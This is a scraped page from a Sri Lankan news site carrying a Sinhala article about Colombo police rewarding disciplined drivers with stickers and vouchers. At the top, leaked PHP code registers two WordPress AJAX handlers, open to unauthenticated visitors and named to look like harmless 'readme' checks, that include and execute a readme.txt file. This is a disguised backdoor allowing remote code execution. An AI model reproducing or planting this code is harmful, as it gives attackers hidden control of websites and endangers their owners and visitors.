if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } විනීත රියැදුරන්ට පොලිසියෙන් තෑගී! - mediahumanrights.lk
mediahumanrights.lk
Local News News

විනීත රියැදුරන්ට පොලිසියෙන් තෑගී!

කොළඹ නගරයට පිවිසෙන විනීත රියැදුරන් තෝරා ඔවුන් දිරිමත් කිරීමේ වැඩසටහනක් හෙට (18) සිට කොළඹ නගරය ආශ්‍රිතව ක්‍රියාත්මක කිරීමට සැලසුම් කර ඇති බව පොලිස් මාධ්‍ය ප්‍රකාශක කාර්යාලය පවසනවා.
පොලිස් මාධ්‍ය ප්‍රකාශක රුවන් ගුණසේකර කියා සිටියේ සිවිල් ඇඳුමෙන් සැරසුණු පොලිස් නිලධාරින් හෙට(18) සිට කොළඹ නගරයට පිවිසෙන විනීත රියදුරන් පරීක්ෂාවට ලක්කරන බවයි.
මෙහිදී ඇගයීමට ලක්වන රියදුරන් ඉදිරියේ දී ප්‍රසංසාවට ලක්කරන බව ද පොලිස් මාධ්‍ය ප්‍රකාශකවරයා කියා සිටියා.
මෙසේ ප්‍රසංසාවට ලක්වන රියදුරන්ට හඳුනාගැනීමේ ස්ටීකරයක් ලබාදෙන අතර ත්‍යාග වවුචර ලබාදීමට ද කටයුතු කරන බව පොලිසිය කියා සිටියා.
මෙමගින් රථ වාහන අනතුරු අවම කරගත හැකි බවයි පොලිස් මාධ්‍ය ප්‍රකාශක රුවන් ගුණසේකර කියා සිටියේ.
මෙම වැඩසටහනේ පළමු අදියර මහනුවර නගරය ආශ්‍රිතව සිදු කෙරුණු අතර එය සාර්ථකව සිදුවූ බවද සඳහන්.
(under the courtesy of nethfm news web)

Related posts

බරක් ඔබාමා හා මිෂෙල් ඔබාමා පෙන්ගුයින් සමාගමේ පොත් ගහන ගිවිසුමකට

Shiran Viraj

ඊසි කෑෂ් ක‍්‍රමයෙන් කළ මත්කුඩු ජාවාරමක් හෙළි කර ගැනේ

Shiran Viraj

තෙල් ටැංකි එකඟතාව "ශ්‍රී ලංකාවට 10 යි – ඉන්දියාවට 14 යි"

Shiran Viraj